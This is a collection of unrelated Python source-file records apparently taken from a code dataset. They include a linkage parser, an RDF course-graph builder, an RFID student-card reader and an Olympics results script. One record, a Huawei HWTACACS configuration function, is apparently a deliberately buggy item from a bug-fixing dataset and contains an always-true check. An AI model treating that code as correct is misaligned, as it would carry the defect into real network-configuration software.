color=['r','b'])\nplt.show()","sub_path":"Machine Learning/ML3.py","file_name":"ML3.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138907080","text":"#### RETRIEVING FUNCTIONS \n\n\ndef extractGroupRelations(groupings, linkages):\n #clean list\n count = 0\n for line in linkages: \n spl = line.split()\n if len(spl) > 3:\n if '\"' in spl[0] and spl[1]:\n newLine=spl[0]+spl[1] + ' '+' '.join(spl[2:])\n linkages[count] = newLine.replace('\"', '')\n \n if '\"' in spl[-1] and spl[-2]:\n newLine=' '.join(spl[0:2]) + ' ' + spl[-2]+spl[-1] \n linkages[count] = newLine.replace('\"', '')\n count = count +1\n\n cleaned_linkages = linkages\n # verify if group expends on several lines: create grouping dict\n for group in groupings:\n\n # extract group name\n groupName = group.split('Group')[1].split('{')[0].strip().replace(' ', '').replace('\"', '')\n # extract relations included in grouping\n groupRelations = group.split('Group')[1].split('{')[1].replace('}', '').split() \n #clean group\n cnt=0\n 
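# --- Editor's aside: a hedged sketch, not part of create_cv.py above. ---
# create_cv.py saves a list of (train_index, test_index) tuples with np.save.
# On recent NumPy, such ragged index pairs must be placed in an explicit
# object array, and loading them back needs allow_pickle=True:
import numpy as np
from sklearn.model_selection import GroupShuffleSplit

X = np.arange(20).reshape(10, 2)            # 10 toy samples
y = np.array([0, 1] * 5)
groups = np.repeat(np.arange(5), 2)         # 5 "subjects", 2 samples each

gss = GroupShuffleSplit(n_splits=3, test_size=0.2, random_state=0)
folds = list(gss.split(X, y, groups))

arr = np.empty(len(folds), dtype=object)    # avoid ragged-array errors
for i, fold in enumerate(folds):
    arr[i] = fold
np.save("cv_folds.npy", arr)
np.load("cv_folds.npy", allow_pickle=True)  # round-trips the index pairs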
for elem in groupRelations:\n if (groupRelations[cnt][0] == '\"') and (groupRelations[cnt+1][-1]=='\"'):\n groupRelations[cnt]=groupRelations[cnt]+groupRelations[cnt+1]\n groupRelations.remove(groupRelations[cnt+1])\n cnt = cnt+1\n\n # extract relations to duplicate\n toDuplicate = []\n for link in linkages:\n if (groupName in link) and ('-' in link):\n toDuplicate.append(link)\n # extract first and last relations of grouping (ie 'no from' or 'no to' task)\n firstRelation = None\n lastRelation = None\n for elem in groupRelations:\n #print('elem:'+ elem)\n hasFirst = False\n hasLast = False\n\n for link in linkages:\n #print(link)\n if elem in link.split()[0]:\n hasLast = True\n #print('has last')\n elif elem in link.split()[-1]:\n hasFirst = True\n #print('has first')\n\n if not hasFirst:\n firstRelation=elem\n elif not hasLast:\n lastRelation=elem\n else:\n pass\n\n # regenerate relations according to the type \n for relation in toDuplicate:\n chunks = relation.split()\n if groupName in chunks:\n if groupName == chunks[0].strip():\n for elem in groupRelations:\n #duplicatedRelation = firstRelation + ' ' + ' '.join(chunks[1:])\n duplicatedRelation = elem + ' ' + ' '.join(chunks[1:])\n linkages.append(duplicatedRelation) \n else: # groupName == chunks[-1].strip():\n for elem in groupRelations:\n #duplicatedRelation = firstRelation + ' ' + ' '.join(chunks[1:])\n duplicatedRelation = ' '.join(chunks[:-1]) + ' ' + elem\n linkages.append(duplicatedRelation) \n else:\n pass\n\n # remove former relations with grouping name\n cleaned_linkages = []\n for relation in linkages:\n if groupName not in relation:\n cleaned_linkages.append(relation)\n\n return cleaned_linkages\n\n\ndef extractChunks(data):\n events, internalEvents = [], []\n groupings, linkages = [], []\n roles = []\n #misc = []\n\n for line in data:\n if (line[0] != '#'):\n if ('src' in line) and ('tgt' in line):\n lineclean = line.replace('= ', '=').replace(' =', '=').replace(' = ', '=')\n events.append(lineclean)\n for elem in line.split(' '):\n if ('src' in elem) or ('tgt' in elem):\n elemclean = elem.strip().replace('tgt=', '').replace('src=', '').replace(']', '')\n if elemclean != '' and (elemclean not in roles):\n roles.append(elemclean)\n elif ('-' in line) and ('>' in line):\n linkages.append(line.strip())\n elif ('role=' in line):\n nameChunk = line.split()\n role = nameChunk.pop()\n name=''.join(nameChunk).replace('\"', '')\n cleanedInternalEvent = name+' '+ role\n internalEvents.append(cleanedInternalEvent)\n else:\n pass\n #misc.append(line)\n \n for i in range(0, len(linkages)):\n if (linkages[i][0] == '#'):\n linkages.remove(linkages[i])\n\n linkages = extractGroupRelations(groupings, linkages)\n\n chunks = {\n 'events':events,\n 'internalEvents':internalEvents,\n 'linkages':linkages,\n }\n return chunks, roles\n\n\ndef extractRoleChunks(data):\n events, internalEvents = [], []\n linkages = []\n\n for line in data:\n if (line[0] != '#'): \n if 'role=' in line:\n internalEvents.append(line)\n elif ('src=' in line) or ('tgt=' in line) or ('?(' in line) or ('!(' in line):\n events.append(line)\n elif ('-' in line) and ('>' in line):\n linkages.append(line)\n else:\n pass\n \n chunks = {\n 'events':events,\n 'internalEvents':internalEvents,\n 'linkages':linkages,\n }\n return chunks\n\n\n\ndef getLinkages(projRefs, linkages):\n for ref in projRefs:\n testRef=ref.replace('s','').replace('r', '')\n count=0\n for line in linkages:\n if testRef in line:\n lineUpd=line.strip().split(' ')\n i=0\n for elem in lineUpd:\n if (testRef == 
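# --- Editor's sketch; the quoting convention is inferred from chunking.py. ---
# Several loops above re-join task names that were split on the space inside
# double quotes ('"foo bar"' -> 'foobar'). A compact equivalent:
def join_quoted(tokens):
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith('"') and not tok.endswith('"') and i + 1 < len(tokens):
            tok += tokens[i + 1]            # glue the two halves back together
            i += 1
        out.append(tok.replace('"', ''))
        i += 1
    return out

# join_quoted(['"task', 'one"', '->', 'B']) == ['taskone', '->', 'B']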
elem) and elem[0] != '#':\n lineUpd[i]=ref\n i = i+1 \n linkages[count] = ' '.join(lineUpd)\n count = count+1\n #print(linkages) \n return linkages\n\n ","sub_path":"client/api/src/utils/chunking.py","file_name":"chunking.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216792295","text":"def get_hwtacacs_host_server_cfg(self, **kwargs):\n ' Get hwtacacs host server configure '\n module = kwargs['module']\n hwtacacs_template = module.params['hwtacacs_template']\n hwtacacs_server_host_name = module.params['hwtacacs_server_host_name']\n hwtacacs_server_type = module.params['hwtacacs_server_type']\n hwtacacs_is_secondary_server = module.params['hwtacacs_is_secondary_server']\n hwtacacs_vpn_name = module.params['hwtacacs_vpn_name']\n hwtacacs_is_public_net = module.params['hwtacacs_is_public_net']\n state = module.params['state']\n result = dict()\n result['hwtacacs_server_name_cfg'] = []\n need_cfg = False\n conf_str = (CE_GET_HWTACACS_HOST_SERVER_CFG % hwtacacs_template)\n recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)\n if ('' in recv_xml):\n if (state == 'present'):\n need_cfg = True\n else:\n xml_str = recv_xml.replace('\\r', '').replace('\\n', '').replace('xmlns=\"urn:ietf:params:xml:ns:netconf:base:1.0\"', '').replace('xmlns=\"http://www.huawei.com/netconf/vrp\"', '')\n root = ElementTree.fromstring(xml_str)\n hwtacacs_server_name_cfg = root.findall('hwtacacs/hwTacTempCfgs/hwTacTempCfg/hwTacHostSrvCfgs/hwTacHostSrvCfg')\n if hwtacacs_server_name_cfg:\n for tmp in hwtacacs_server_name_cfg:\n tmp_dict = dict()\n for site in tmp:\n if (site.tag in ['serverHostName', 'serverType', 'isSecondaryServer', 'isPublicNet', 'vpnName']):\n tmp_dict[site.tag] = site.text\n result['hwtacacs_server_name_cfg'].append(tmp_dict)\n if result['hwtacacs_server_name_cfg']:\n cfg = dict()\n config_list = list()\n if hwtacacs_server_host_name:\n cfg['serverHostName'] = hwtacacs_server_host_name.lower()\n if hwtacacs_server_type:\n cfg['serverType'] = hwtacacs_server_type.lower()\n if hwtacacs_is_secondary_server:\n cfg['isSecondaryServer'] = str(hwtacacs_is_secondary_server).lower()\n if hwtacacs_is_public_net:\n cfg['isPublicNet'] = str(hwtacacs_is_public_net).lower()\n if hwtacacs_vpn_name:\n cfg['vpnName'] = hwtacacs_vpn_name.lower()\n for tmp in result['hwtacacs_server_name_cfg']:\n exist_cfg = dict()\n if hwtacacs_server_host_name:\n exist_cfg['serverHostName'] = tmp.get('serverHostName').lower()\n if hwtacacs_server_type:\n exist_cfg['serverType'] = tmp.get('serverType').lower()\n if hwtacacs_is_secondary_server:\n exist_cfg['isSecondaryServer'] = tmp.get('isSecondaryServer').lower()\n if hwtacacs_is_public_net:\n exist_cfg['isPublicNet'] = tmp.get('isPublicNet').lower()\n if hwtacacs_vpn_name:\n exist_cfg['vpnName'] = tmp.get('vpnName').lower()\n config_list.append(exist_cfg)\n if (cfg in config_list):\n if (state == 'present'):\n need_cfg = False\n else:\n need_cfg = True\n elif (state == 'present'):\n need_cfg = True\n else:\n need_cfg = False\n result['need_cfg'] = need_cfg\n return result","sub_path":"Data Set/bug-fixing-4/9aabe704526857ab9b4c7877f5e1b9e60d4ecb9b--bug.py","file_name":"9aabe704526857ab9b4c7877f5e1b9e60d4ecb9b--bug.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571884347","text":"import rdflib\nimport pandas\nfrom rdflib import Graph, Namespace, RDF, RDFS, BNode, 
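# --- Editor's note: hedged sketch of the XML-handling idiom used above. ---
# The hwtacacs record strips XML namespaces with str.replace before calling
# ElementTree.findall with a plain path. Minimal reproduction:
from xml.etree import ElementTree

raw = ('<data xmlns="urn:example"><hwTacHostSrvCfg>'
       '<serverHostName>tac1</serverHostName>'
       '<serverType>authentication</serverType>'
       '</hwTacHostSrvCfg></data>')

xml_str = raw.replace('xmlns="urn:example"', '')   # drop the namespace
root = ElementTree.fromstring(xml_str)
cfgs = [{site.tag: site.text for site in node}
        for node in root.findall("hwTacHostSrvCfg")]
# cfgs == [{'serverHostName': 'tac1', 'serverType': 'authentication'}]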
Literal, URIRef\nfrom rdflib.namespace import DC, FOAF, XSD\nimport math\n\ndef create_university(kGraph, universityClass, ISPData):\n\textend=\"1\"+\"_\".join(\"Concordia University\".split())\n\tuniversityInstance=URIRef(ISPData+\"university/\"+extend)\n\tkGraph.add((universityInstance, RDF.type, universityClass))\n\tkGraph.add((universityInstance, FOAF.name, Literal(str(\"Concordia University\"))))\n\tkGraph.add((universityInstance, DC.source, Literal(str(\"http://dbpedia.org/page/Concordia_University\"))))\n\t\n\treturn kGraph, universityInstance\n\ndef create_courses(courses, kGraph, universityInstance, courseClass, ISPData, ISPSchema):\n\tcourseIntances_id=dict()\n\t\n\tfor loop in range(0,len(courses)):\n\t\tcourse=courses[loop]\n\t\t\n\t\tkey=course['Course Subject']+\":\"+str(course['Course Number'])\n\t\textend=course['Course Subject']+\"_\"+str(course['Course Number'])\n\t\tcourseInstance=URIRef(ISPData+\"courses/\"+str(loop)+extend)\n\t\tkGraph.add((courseInstance, RDF.type, courseClass))\n\t\tkGraph.add((courseInstance, FOAF.name, Literal(str(course['Course Name']))))\n\t\tkGraph.add((courseInstance, DC.subject, Literal(str(course['Course Subject']))))\n\t\tkGraph.add((courseInstance, DC.identifier, Literal(course['Course Number'])))\n\t\tdesp=course['Course Description']\n\t\tif type(desp)==float:\n\t\t\tdesp=\"\"\n\t\tkGraph.add((courseInstance, DC.description, Literal(desp)))\n\t\tkGraph.add((courseInstance, RDFS.seeAlso, Literal(str(course['Link']))))\n\t\tkGraph.add((universityInstance, ISPSchema.coversCourse, courseInstance))\n\t\tcourseIntances_id[key]=courseInstance\n\treturn kGraph, courseIntances_id\n\t\n\ndef create_topics(courseIntances_id, kGraph, topicClass, topics, ISPData, ISPSchema):\n\t\n\tins=0\n\tfor loop in range(0,len(topics)):\n\t\ttopic=topics[loop]\n\t\t\n\t\tkey=topic['Course Subject']+\":\"+str(topic['Course Number'])\n\t\tif key in courseIntances_id:\n\t\t\textend=\"_\".join(topic['Topic'].split())\n\t\t\ttopicInstance=URIRef(ISPData+\"topics/\"+str(loop)+extend)\n\t\t\tins+=1\n\t\t\tkGraph.add((topicInstance, RDF.type, topicClass))\n\t\t\tkGraph.add((topicInstance, FOAF.name, Literal(str(topic['Topic']))))\n\t\t\tkGraph.add((topicInstance, DC.source, Literal(str(topic['URI']))))\n\t\t\tkGraph.add((courseIntances_id[key], ISPSchema.hasPart, topicInstance))\n\t\n\tprint(ins)\n\treturn kGraph\n\t\n\t\ndef create_students(kGraph, studentClass, students, universityInstance, ISPData, ISPSchema, DBP):\n\tstudentIntances_id=dict()\n\t\n\tfor loop in range(0,len(students)):\n\t\tstudent=students[loop]\n\t\t\n\t\tkey=str(student['ID Number'])\n\t\textend=str(student['ID Number'])\n\t\tstudentInstance=URIRef(ISPData+\"students/\"+extend)\n\t\tkGraph.add((studentInstance, RDF.type, studentClass))\n\t\tkGraph.add((studentInstance, FOAF.givenName, Literal(str(student['FirstName']))))\n\t\tkGraph.add((studentInstance, FOAF.familyName, Literal(str(student['LastName']))))\n\t\tkGraph.add((studentInstance, DBP.id, Literal(str(student['ID Number']))))\n\t\tkGraph.add((studentInstance, FOAF.mbox, Literal(str(student['Email']))))\n\t\tkGraph.add((studentInstance, ISPSchema.studiesAt, universityInstance))\n\t\tstudentIntances_id[key]=studentInstance\n\t\t\n\t\n\treturn kGraph, studentIntances_id\n\t\ndef create_grades(kGraph, gradeClass, grades, studentIntances_id, DBP, courseIntances_id, ISPData, ISPSchema):\n\t\n\tfor loop in range(0,len(grades)):\n\t\tgrade=grades[loop]\n\t\t\n\t\tkeyStudent=str(grade['Student ID'])\n\t\tkeyCourse=\":\".join(grade['Course ID(COMP 
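# --- Editor's sketch (illustrative; the URIs below are placeholders). ---
# The knowledge-graph record above builds instances by minting a URIRef and
# attaching rdf:type plus literal properties. The same pattern in isolation:
from rdflib import Graph, Literal, Namespace, RDF, URIRef
from rdflib.namespace import FOAF

EX = Namespace("http://example.org/data/")
g = Graph()

course = URIRef(EX + "courses/0_COMP_474")
g.add((course, RDF.type, EX.Course))
g.add((course, FOAF.name, Literal("Intelligent Systems")))

print(g.serialize(format="turtle"))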
464)'].split())\n\t\t\n\t\tif keyStudent in studentIntances_id and keyCourse in courseIntances_id:\n\t\t\tgradeInstance=URIRef(ISPData+\"course_grades/\"+str(loop))\n\t\t\tkGraph.add((gradeInstance, RDF.type, gradeClass))\n\t\t\tkGraph.add((gradeInstance, DC.subject, courseIntances_id[keyCourse]))\n\t\t\tkGraph.add((gradeInstance, DBP.score, Literal(str(grade['Grade']))))\n\t\t\tkGraph.add((gradeInstance, DBP.termPeriod, Literal(str(grade['Term']))))\n\t\t\tkGraph.add((studentIntances_id[keyStudent], ISPSchema.tookCourse, gradeInstance))\n\t\t\t\n\t\n\treturn kGraph\n\t\n\t\n\t\n\t\nbaseGraphFile=\"universityKG.ttl\"\n\nkGraph=Graph()\nkGraph.parse(baseGraphFile, format=\"ttl\")\n\t\nDBP=Namespace(\"http://dbpedia.org/property/\")\nISPSchema=Namespace(\"http://intelligentsystemproj1.io/schema#\")\nISPData=Namespace(\"http://intelligentsystemproj1.io/data/\")\n\n##CSV files to be created\nuniversitiesCSVname=r\"CSV\\Universities.csv\"\ncoursesCSVname=r'CSV\\Courses.csv'\ntopicsCSVname=r\"CSV\\Topics.csv\"\nstudentsCSVname=r\"CSV\\Students.csv\"\ngradesCSVname=r\"CSV\\Grades.csv\"\n\ncourseClass\t=\tISPSchema.Course\nuniversityClass\t=\tISPSchema.University\ntopicClass\t=\tISPSchema.Topic\nstudentClass\t=\tISPSchema.Student\ngradeClass\t=\tISPSchema.CourseGrade\n\ncourses\t=\tpandas.read_csv(coursesCSVname).to_dict('records')\ntopics\t=\tpandas.read_csv(topicsCSVname).to_dict('records')\nstudents\t=\tpandas.read_csv(studentsCSVname).to_dict('records')\ngrades\t=\tpandas.read_csv(gradesCSVname).to_dict('records')\n\nkGraph, universityInstance\t=\tcreate_university(kGraph, universityClass, ISPData)\nkGraph, courseIntances_id\t=\tcreate_courses(courses, kGraph, universityInstance, courseClass, ISPData, ISPSchema)\nkGraph\t=\tcreate_topics(courseIntances_id, kGraph, topicClass, topics, ISPData, ISPSchema)\nkGraph, studentIntances_id\t=\tcreate_students(kGraph, studentClass, students, universityInstance, ISPData, ISPSchema, DBP)\nkGraph\t=\tcreate_grades(kGraph, gradeClass, grades, studentIntances_id, DBP, courseIntances_id, ISPData, ISPSchema)\nkGraph.serialize(destination='DataGraph.ttl', format='turtle')\n\n\t\n","sub_path":"3CreateKnowledgeGraph.py","file_name":"3CreateKnowledgeGraph.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36449349","text":"hash=dict()\ndef go(s,count):\n G=tuple(s)\n if((G,count) in hash): return hash[(G,count)]\n if(len(s)==1):return count\n maxx,flag=0,0\n if(s[0]-s[1]==1):\n l=s.copy()\n flag=1\n l.pop(0)\n maxx=max(maxx,go(l,count+1)) \n if(s[len(s)-1]-s[len(s)-2]==1):\n l=s.copy()\n flag=1\n l.pop()\n maxx=max(maxx,go(l,count+1)) \n for i in range(1,len(s)-1):\n if(s[i]!=0):\n if((s[i]-s[i+1]==1) or (s[i]-s[i-1]==1)):\n flag=1\n l=s.copy()\n l.pop(i)\n maxx=max(maxx,go(l,count+1))\n if(flag==0):\n hash[(G,count)]=count\n return count\n hash[(G,count)]=maxx\n return maxx\nn=int(input())\nl=input()\narr=[(ord(x)-97) for x in l]\nprint(go(arr,0))\n","sub_path":"XXX/brute.py","file_name":"brute.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467942644","text":"import hid\nimport datetime\nfrom app.mod_rfid.models import Student, Reads\nfrom peewee import DoesNotExist\n\ndevice_product_name = 'SYC ID&IC USB Reader'\ndevice = None\n\ndef find_device():\n for d in hid.enumerate():\n keys = list(d.keys())\n keys.sort()\n for key in keys:\n #print(\"%s : %s\" % (key, 
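# --- Editor's aside: hedged rewrite of the memo idiom in brute.py above. ---
# brute.py keys its memo dict on (tuple(state), count). Keying on the state
# alone and returning the best *additional* removals memoises far better:
from functools import lru_cache

@lru_cache(maxsize=None)
def best_removals(state):
    """Max letters removable from `state` (a tuple of letter ranks)."""
    best = 0
    for i, v in enumerate(state):
        left = state[i - 1] if i > 0 else None
        right = state[i + 1] if i + 1 < len(state) else None
        if (left is not None and v - left == 1) or \
           (right is not None and v - right == 1):
            rest = state[:i] + state[i + 1:]
            best = max(best, 1 + best_removals(rest))
    return best

# best_removals(tuple(ord(c) - 97 for c in "bacabcab")) -> 4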
d[key]))\n if key == 'product_string' and d[key] == device_product_name:\n print('Opening ' + device_product_name + '...')\n\n _device = hid.device()\n _device.open(d['vendor_id'], d['product_id'], d['serial_number'])\n return _device\n if device is not None:\n return None\n\ndef read_device_data(device):\n # enable non-blocking mode\n device.set_nonblocking(1)\n\n print(\"Reading the data...\")\n card = []\n while True:\n try:\n d = device.read(4)\n if d:\n if type(d) is list:\n char = d[2]\n if char > 0:\n if char < 39:\n card.append(str(char - 29))\n elif char == 39:\n card.append(str(0))\n if len(card) == 10:\n card_id = \"\".join(card)\n\n student_name = input(\"Enter name: \")\n record_card_student(card_id, student_name)\n\n exit()\n except KeyboardInterrupt as e:\n print(\"\\n\\nSo long and thanks for all the cards!\")\n exit()\n\n\ndef record_card_student(card_id, student_name):\n #student = None\n student = Student.create(rfid_id=card_id, name=student_name, last_seen = datetime.datetime.now())\n\n print(\"Student recorded: \" + student.name)\n\n\nreader_device = find_device()\n\nif reader_device is None:\n raise Exception('Could not find any mathing device for the following name: ' + device_product_name)\nelse:\n print(\"Connected to device!\")\n print(\" Manufacturer: %s\" % reader_device.get_manufacturer_string())\n print(\" Product: %s\" % reader_device.get_product_string())\n print(\" Serial No: %s\" % reader_device.get_serial_number_string())\n\n read_device_data(reader_device)\n","sub_path":"add_student_mac.py","file_name":"add_student_mac.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"135494023","text":"def printCompetitor(competitor):\r\n '''\r\n Given the data of a competitor, the function prints it in a specific format.\r\n Arguments:\r\n competitor: {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor country': competitor_country,\r\n 'result': result}\r\n '''\r\n competition_name = competitor['competition name']\r\n competition_type = competitor['competition type']\r\n competitor_id = competitor['competitor id']\r\n competitor_country = competitor['competitor country']\r\n result = competitor['result']\r\n\r\n print(f'Competitor {competitor_id} from {competitor_country} participated in {competition_name} ({competition_type}) and scored {result}')\r\n\r\n\r\ndef printCompetitionResults(competition_name, winning_gold_country, winning_silver_country, winning_bronze_country):\r\n '''\r\n Given a competition name and its champs countries, the function prints the winning countries\r\n in that competition in a specific format.\r\n Arguments:\r\n competition_name: the competition name\r\n winning_gold_country, winning_silver_country, winning_bronze_country: the champs countries\r\n '''\r\n undef_country = 'undef_country'\r\n countries = [country for country in [winning_gold_country,\r\n winning_silver_country, winning_bronze_country] if country != undef_country]\r\n print(\r\n f'The winning competitors in {competition_name} are from: {countries}')\r\n\r\n\r\ndef key_sort_competitor(competitor):\r\n '''\r\n A helper function that creates a special key for sorting competitors.\r\n Arguments:\r\n competitor: a dictionary contains the data of a competitor in the following format:\r\n {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor 
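# --- Editor's note: a hedged sketch of the keycode mapping used above. ---
# The USB reader emits HID keyboard usage codes: usages 30..38 are the keys
# '1'..'9' and usage 39 is '0', which is exactly what `char - 29` encodes.
def usage_to_digit(usage):
    if 30 <= usage <= 38:
        return str(usage - 29)
    if usage == 39:
        return "0"
    return None          # not a digit key

def decode_card(usages, length=10):
    digits = [d for d in (usage_to_digit(u) for u in usages) if d]
    return "".join(digits[:length])

# decode_card([30, 39, 31, 0, 32]) == "1023"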
country': competitor_country,\r\n 'result': result}\r\n '''\r\n competition_name = competitor['competition name']\r\n result = competitor['result']\r\n return (competition_name, result)\r\n\r\n\r\ndef readParseData(file_name):\r\n '''\r\n Given a file name, the function returns a list of competitors.\r\n Arguments:\r\n file_name: the input file name. Assume that the input file is in the directory of this script.\r\n Return value:\r\n A list of competitors, such that every record is a dictionary, in the following format:\r\n {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor country': competitor_country,\r\n 'result': result}\r\n '''\r\n competitors_in_competitions = []\r\n # Part A, Task 3.4\r\n contries_by_competitor_ids = {}\r\n\r\n with open(file_name, 'r') as input_file:\r\n for line in input_file:\r\n if line[0] == '#':\r\n continue\r\n\r\n entry_parts = line.strip().split(' ')\r\n if entry_parts[0] == 'competitor':\r\n contries_by_competitor_ids[int(\r\n entry_parts[1])] = entry_parts[2]\r\n else:\r\n assert entry_parts[\r\n 0] == 'competition', f'Invalid line in input file:\\n{line}'\r\n competitors_in_competitions.append({'competition name': entry_parts[1],\r\n 'competitor id': int(entry_parts[2]),\r\n 'competition type': entry_parts[3],\r\n 'result': int(entry_parts[4]),\r\n 'competitor country': None\r\n })\r\n\r\n for entry in competitors_in_competitions:\r\n country = contries_by_competitor_ids.get(entry['competitor id'])\r\n assert country, f'Missing information for competitor: {entry[\"competitor id\"]}'\r\n entry['competitor country'] = country\r\n\r\n return competitors_in_competitions\r\n\r\n\r\ndef getValidEntriesByCompetition(competitors_in_competitions):\r\n '''\r\n Converts the entries to a more convinient structure\r\n {\r\n 'competition name': {\r\n 'type': TYPE\r\n 'entries': [\r\n entry0,\r\n entry1,\r\n entry2,\r\n ...\r\n ]\r\n }\r\n }\r\n '''\r\n entries_by_competition = {x['competition name']: {'type': x['competition type'], 'entries': []}\r\n for x in competitors_in_competitions}\r\n # Init empty lists for each competition\r\n # banned_by_competition = {x['competition name']: []\r\n # for x in entries_by_competition}\r\n\r\n for entry in competitors_in_competitions:\r\n # Create a new competition key if doesn't exist\r\n competition = entries_by_competition[entry['competition name']]\r\n\r\n competitor_entries = [x for x in competitors_in_competitions\r\n if x['competitor id'] == entry['competitor id'] and\r\n x['competition name'] == entry['competition name']]\r\n\r\n if len(competitor_entries) == 1:\r\n competition['entries'].append({'competitor id': entry['competitor id'],\r\n 'competitor country': entry['competitor country'],\r\n 'result': entry['result']\r\n })\r\n\r\n entries_by_competition = {x: entries_by_competition[x] for x in entries_by_competition\r\n if entries_by_competition[x]['entries']}\r\n\r\n return entries_by_competition\r\n\r\n\r\ndef calcCompetitionsResults(competitors_in_competitions):\r\n '''\r\n Given the data of the competitors, the function returns the champs countries for each competition.\r\n Arguments:\r\n competitors_in_competitions: A list that contains the data of the competitors\r\n (see readParseData return value for more info)\r\n Retuen value:\r\n A list of competitions and their champs (list of lists).\r\n Every record in the list contains the competition name and the champs, in the following format:\r\n [competition_name, winning_gold_country,\r\n 
winning_silver_country, winning_bronze_country]\r\n '''\r\n competitions_champs = []\r\n competitions = getValidEntriesByCompetition(competitors_in_competitions)\r\n # competitors = set([x['competitor id']\r\n # for x in competitors_in_competitions])\r\n\r\n for competition in competitions:\r\n competition_info = competitions[competition]\r\n if competition_info['type'] in ['knockout', 'timed']:\r\n reverse_results = False\r\n else:\r\n assert competition_info[\r\n 'type'] == 'untimed', f'Unknown competition type: {competition_info[\"type\"]}'\r\n reverse_results = True\r\n\r\n sorted_entries = sorted(competition_info['entries'], key=lambda x: x['result'],\r\n reverse=reverse_results)\r\n\r\n winning_countries = [x['competitor country'] for x in sorted_entries]\r\n\r\n competitions_champs.append(\r\n [competition]+(winning_countries+['undef_country']*2)[0:3])\r\n\r\n # TODO Part A, Task 3.5\r\n\r\n return competitions_champs\r\n\r\n\r\ndef partA(file_name='input.txt', allow_prints=True):\r\n # read and parse the input file\r\n competitors_in_competitions = readParseData(file_name)\r\n if allow_prints:\r\n for competitor in sorted(competitors_in_competitions, key=key_sort_competitor):\r\n printCompetitor(competitor)\r\n\r\n # calculate competition results\r\n competitions_results = calcCompetitionsResults(competitors_in_competitions)\r\n if allow_prints:\r\n for competition_result_single in sorted(competitions_results):\r\n printCompetitionResults(*competition_result_single)\r\n\r\n return competitions_results\r\n\r\n\r\ndef partB(file_name='input.txt'):\r\n competitions_results = partA(file_name, allow_prints=False)\r\n import Olympics\r\n olympics = Olympics.OlympicsCreate()\r\n\r\n for champ in competitions_results:\r\n Olympics.OlympicsUpdateCompetitionResults(\r\n olympics, str(champ[1]), str(champ[2]), str(champ[3]))\r\n\r\n Olympics.OlympicsWinningCountry(olympics)\r\n Olympics.OlympicsDestroy(olympics)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n The main part of the script.\r\n __main__ is the name of the scope in which top-level code executes.\r\n\r\n To run only a single part, comment the line below which correspondes to the part you don't want to run.\r\n '''\r\n file_name = 'input.txt'\r\n\r\n partA(file_name)\r\n partB(file_name)\r\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":8830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574292832","text":"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2014 Florian Bruhin (The Compiler) \n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. 
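# --- Editor's aside (illustrative, mirrors calcCompetitionsResults above). ---
# The winners list is padded with 'undef_country' and cut to three entries in
# one expression; printCompetitionResults later filters the padding back out:
def top_three(countries, pad="undef_country"):
    return (countries + [pad] * 2)[:3]

# top_three(["DE", "FR", "IT", "ES"]) == ["DE", "FR", "IT"]
# top_three(["DE"])                   == ["DE", "undef_country", "undef_country"]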
If not, see .\n\n\"\"\"The main tabbed browser widget.\"\"\"\n\nimport functools\nimport collections\n\nfrom PyQt5.QtWidgets import QSizePolicy\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, QSize, QTimer, QUrl\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWebKitWidgets import QWebPage\n\nfrom qutebrowser.config import config\nfrom qutebrowser.commands import cmdexc\nfrom qutebrowser.keyinput import modeman\nfrom qutebrowser.mainwindow import tabwidget\nfrom qutebrowser.browser import signalfilter, commands, webview\nfrom qutebrowser.utils import (log, message, usertypes, utils, qtutils, objreg,\n urlutils)\n\n\nUndoEntry = collections.namedtuple('UndoEntry', ['url', 'history'])\n\n\nclass TabbedBrowser(tabwidget.TabWidget):\n\n \"\"\"A TabWidget with QWebViews inside.\n\n Provides methods to manage tabs, convenience methods to interact with the\n current tab (cur_*) and filters signals to re-emit them when they occured\n in the currently visible tab.\n\n For all tab-specific signals (cur_*) emitted by a tab, this happens:\n - the signal gets filtered with _filter_signals and self.cur_* gets\n emitted if the signal occured in the current tab.\n\n Attributes:\n _win_id: The window ID this tabbedbrowser is associated with.\n _filter: A SignalFilter instance.\n _now_focused: The tab which is focused now.\n _tab_insert_idx_left: Where to insert a new tab with\n tabbar -> new-tab-position set to 'left'.\n _tab_insert_idx_right: Same as above, for 'right'.\n _undo_stack: List of UndoEntry namedtuples of closed tabs.\n\n Signals:\n cur_progress: Progress of the current tab changed (loadProgress).\n cur_load_started: Current tab started loading (loadStarted)\n cur_load_finished: Current tab finished loading (loadFinished)\n cur_statusbar_message: Current tab got a statusbar message\n (statusBarMessage)\n cur_url_text_changed: Current URL text 